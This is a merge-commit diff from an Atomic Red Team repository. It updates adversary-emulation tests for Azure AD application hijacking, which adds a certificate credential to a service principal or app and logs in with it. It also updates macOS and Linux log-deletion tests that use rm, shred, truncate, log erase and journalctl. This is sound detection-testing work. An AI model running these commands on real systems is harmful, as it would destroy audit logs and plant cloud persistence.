security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into gcp-atomic-additions

Browse Source
This commit is contained in:
Hare Sudhan
2023-06-11 23:48:43 -04:00
committed by GitHub
parent d50b6d69d8 d8c164d3e6
commit 336f8976d7
8 changed files with 899 additions and 196 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/azure-ad-index.yaml
+10 -34
View File
@@ -37535,14 +37535,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37566,21 +37558,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37593,8 +37582,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -37618,14 +37606,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37649,21 +37629,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37676,8 +37653,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
T1053.004:
atomics/Indexes/index.yaml
+231 -52
View File
@@ -4580,10 +4580,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
input_arguments:
syslog_path:
description: path of syslog file to delete. On macos it's /var/log/system.log*,
on linux, it's /var/log/syslog*. Also note for File events, that on macos,
/var/ is a link to /private/var/.
type: string
default: "/var/log/system.log"
macos_audit_path:
description: path of audit file to delete
type: string
default: "/var/audit/20220725213300.202208110700021"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
&& stat #{syslog_path}
'
get_prereq_command: |
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -4598,7 +4621,6 @@ defense-evasion:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -4610,9 +4632,25 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
truncate --size=0 /var/log/system.log #size parameter \n"
command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
truncate --size=0 #{system_log_path} #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -4624,10 +4662,26 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: |
sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -4638,11 +4692,37 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_name1:
description: name or prefix of system log to delete.
type: string
default: system.log
system_log_name2:
description: name or prefix of system log to delete.
type: string
default: system.log.97.gz
system_log_name3:
description: name or prefix of system log to delete.
type: string
default: system.log.98.gz
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
/var/log/#{system_log_name3}
'
get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
/var/log/#{system_log_name3}
'
executor:
command: |
sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -4653,8 +4733,13 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
executor:
command: 'sudo echo '''' > /var/log/system.log
command: 'sudo echo '''' > #{system_log_path}
'
name: sh
@@ -4680,8 +4765,24 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo unlink /var/log/system.log
command: 'sudo unlink #{system_log_path}
'
name: sh
@@ -4694,8 +4795,24 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo shred -u -z -n 3 /var/log/system.log
command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
@@ -4708,10 +4825,31 @@ defense-evasion:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
system_log_folder:
description: path to log parent folder
type: string
default: "/var/log/"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path} #{system_log_folder}
'
get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
#{system_log_folder}/system.log
'
executor:
command: |
sudo srm /var/log/system.log #system log file deletion
sudo srm -r /var/log/ #recursive deletion of log files
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -4723,8 +4861,24 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
@@ -4738,8 +4892,24 @@ defense-evasion:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
@@ -4753,9 +4923,25 @@ defense-evasion:
'
supported_platforms:
- linux
input_arguments:
journal_folder:
description: path to journal logs
type: string
default: "/var/log/journal"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{journal_folder}
'
get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
'
executor:
command: |
sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -4773,7 +4959,19 @@ defense-evasion:
description: Username of mail spool
type: string
default: root
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat /var/spool/mail/#{username}
'
get_prereq_command: 'touch /var/spool/mail/#{username}
'
executor:
elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
@@ -4796,6 +4994,11 @@ defense-evasion:
'
name: bash
elevation_required: true
cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
; fi
'
T1218.004:
technique:
x_mitre_platforms:
@@ -62806,14 +63009,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62837,21 +63032,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62864,8 +63056,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -62889,14 +63080,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62920,21 +63103,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62947,8 +63127,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
atomics/Indexes/linux-index.yaml
+59 -3
View File
@@ -3310,10 +3310,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
input_arguments:
syslog_path:
description: path of syslog file to delete. On macos it's /var/log/system.log*,
on linux, it's /var/log/syslog*. Also note for File events, that on macos,
/var/ is a link to /private/var/.
type: string
default: "/var/log/system.log"
macos_audit_path:
description: path of audit file to delete
type: string
default: "/var/audit/20220725213300.202208110700021"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
&& stat #{syslog_path}
'
get_prereq_command: |
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete system journal logs via rm and journalctl utilities
@@ -3325,9 +3348,25 @@ defense-evasion:
'
supported_platforms:
- linux
input_arguments:
journal_folder:
description: path to journal logs
type: string
default: "/var/log/journal"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{journal_folder}
'
get_prereq_command: 'mkdir -p #{journal_folder} && touch #{journal_folder}/T1070_002.journal
'
executor:
command: |
sudo rm /var/log/journal/* #physically deletes the journal files, and not just their content
sudo rm #{journal_folder}/* #physically deletes the journal files, and not just their content
sudo journalctl --vacuum-time=0 #clears the journal while still keeping the journal files in place
name: sh
elevation_required: true
@@ -3345,7 +3384,19 @@ defense-evasion:
description: Username of mail spool
type: string
default: root
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat /var/spool/mail/#{username}
'
get_prereq_command: 'touch /var/spool/mail/#{username}
'
executor:
elevation_required: true
command: 'echo 0> /var/spool/mail/#{username}
'
@@ -3368,6 +3419,11 @@ defense-evasion:
'
name: bash
elevation_required: true
cleanup_command: 'if [ "/var/log/secure" != "#{log_path}" ] ; then rm -f #{log_path}
; fi
'
T1218.004:
technique:
x_mitre_platforms:
atomics/Indexes/macos-index.yaml
+187 -17
View File
@@ -3041,10 +3041,33 @@ defense-evasion:
supported_platforms:
- macos
- linux
input_arguments:
syslog_path:
description: path of syslog file to delete. On macos it's /var/log/system.log*,
on linux, it's /var/log/syslog*. Also note for File events, that on macos,
/var/ is a link to /private/var/.
type: string
default: "/var/log/system.log"
macos_audit_path:
description: path of audit file to delete
type: string
default: "/var/audit/20220725213300.202208110700021"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'if [ -d /var/audit ] ; then stat #{macos_audit_path} ; fi
&& stat #{syslog_path}
'
get_prereq_command: |
touch #{syslog_path}
if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi
executor:
command: |
sudo rm -rf /private/var/log/system.log*
sudo rm -rf /private/var/audit/*
sudo rm -rf #{syslog_path}
if [ -d /var/audit ] ; then sudo rm -rf #{macos_audit_path} ; fi
name: sh
elevation_required: true
- name: Delete log files using built-in log utility
@@ -3059,7 +3082,6 @@ defense-evasion:
command: |
sudo log erase --all
sudo log erase --ttl #Deletes only time-to-live log content
sudo log erase --predicate 'subsystem == "com.apple.appstore"' #Deletes all logs related to the App Store, useful for clearing specific entries of the system log
name: sh
elevation_required: true
- name: Truncate system log files via truncate utility
@@ -3071,9 +3093,25 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: "sudo truncate -s 0 /var/log/system.log #size parameter shorthand\nsudo
truncate --size=0 /var/log/system.log #size parameter \n"
command: "sudo truncate -s 0 #{system_log_path} #size parameter shorthand\nsudo
truncate --size=0 #{system_log_path} #size parameter \n"
name: sh
elevation_required: true
- name: Delete log files via cat utility by appending /dev/null or /dev/zero
@@ -3085,10 +3123,26 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path of system log to delete.
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: |
sudo cat /dev/null > /var/log/system.log #truncating the file to zero bytes
sudo cat /dev/zero > /var/lol/system.log #log file filled with null bytes(zeros)
sudo cat /dev/null > #{system_log_path} #truncating the file to zero bytes
sudo dd if=/dev/zero bs=1000 count=5 of=#{system_log_path} #log file filled with null bytes(zeros)
name: sh
elevation_required: true
- name: System log file deletion via find utility
@@ -3099,11 +3153,37 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_name1:
description: name or prefix of system log to delete.
type: string
default: system.log
system_log_name2:
description: name or prefix of system log to delete.
type: string
default: system.log.97.gz
system_log_name3:
description: name or prefix of system log to delete.
type: string
default: system.log.98.gz
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat /var/log/#{system_log_name1} /var/log/#{system_log_name2}
/var/log/#{system_log_name3}
'
get_prereq_command: 'touch /var/log/#{system_log_name1} /var/log/#{system_log_name2}
/var/log/#{system_log_name3}
'
executor:
command: |
sudo find /var/log -name 'system.log.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "system.log.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "system.log.*" -exec unlink {} \; #using "unlink" execution
sudo find /var/log -name '#{system_log_name1}.*' -exec rm {} \; #using "rm" execution
sudo find /var/log/ -name "#{system_log_name2}.*" -exec shred -u -z -n 3 {} \; #using "shred" execution
sudo find /var/log/ -name "#{system_log_name3}.*" -exec unlink {} \; #using "unlink" execution
name: sh
elevation_required: true
- name: Overwrite macOS system log via echo utility
@@ -3114,8 +3194,13 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
executor:
command: 'sudo echo '''' > /var/log/system.log
command: 'sudo echo '''' > #{system_log_path}
'
name: sh
@@ -3141,8 +3226,24 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo unlink /var/log/system.log
command: 'sudo unlink #{system_log_path}
'
name: sh
@@ -3155,8 +3256,24 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'sudo shred -u -z -n 3 /var/log/system.log
command: 'sudo shred -u -z -n 3 #{system_log_path}
'
name: sh
@@ -3169,10 +3286,31 @@ defense-evasion:
Refer: https://github.com/khell/homebrew-srm/issues/1 for installation
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
system_log_folder:
description: path to log parent folder
type: string
default: "/var/log/"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path} #{system_log_folder}
'
get_prereq_command: 'mkdir -p #{system_log_folder} && touch #{system_log_path}
#{system_log_folder}/system.log
'
executor:
command: |
sudo srm /var/log/system.log #system log file deletion
sudo srm -r /var/log/ #recursive deletion of log files
sudo srm #{system_log_path} #system log file deletion
sudo srm -r #{system_log_folder} #recursive deletion of log files
name: sh
elevation_required: true
- name: Delete system log files using OSAScript
@@ -3184,8 +3322,24 @@ defense-evasion:
'
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'osascript -e ''do shell script "rm /var/log/system.log" with administrator
command: 'osascript -e ''do shell script "rm #{system_log_path}" with administrator
privileges''
'
@@ -3199,8 +3353,24 @@ defense-evasion:
Refer: https://www.rainforestqa.com/blog/macos-tcc-db-deep-dive
supported_platforms:
- macos
input_arguments:
system_log_path:
description: path to system.log
type: string
default: "/var/log/system.log"
dependency_executor_name: sh
dependencies:
- description: 'target files must exist
'
prereq_command: 'stat #{system_log_path}
'
get_prereq_command: 'touch #{system_log_path}
'
executor:
command: 'osascript -e ''tell application "Finder" to delete POSIX file "/var/log/system.log"''
command: 'osascript -e ''tell application "Finder" to delete POSIX file "#{system_log_path}"''
'
name: sh
atomics/T1070.002/T1070.002.md
+215 -20
View File
@@ -58,18 +58,37 @@ Delete system and audit logs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_path | path of syslog file to delete. On macos it's /var/log/system.log*, on linux, it's /var/log/syslog*. Also note for File events, that on macos, /var/ is a link to /private/var/. | string | /var/log/system.log|
| macos_audit_path | path of audit file to delete | string | /var/audit/20220725213300.202208110700021|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
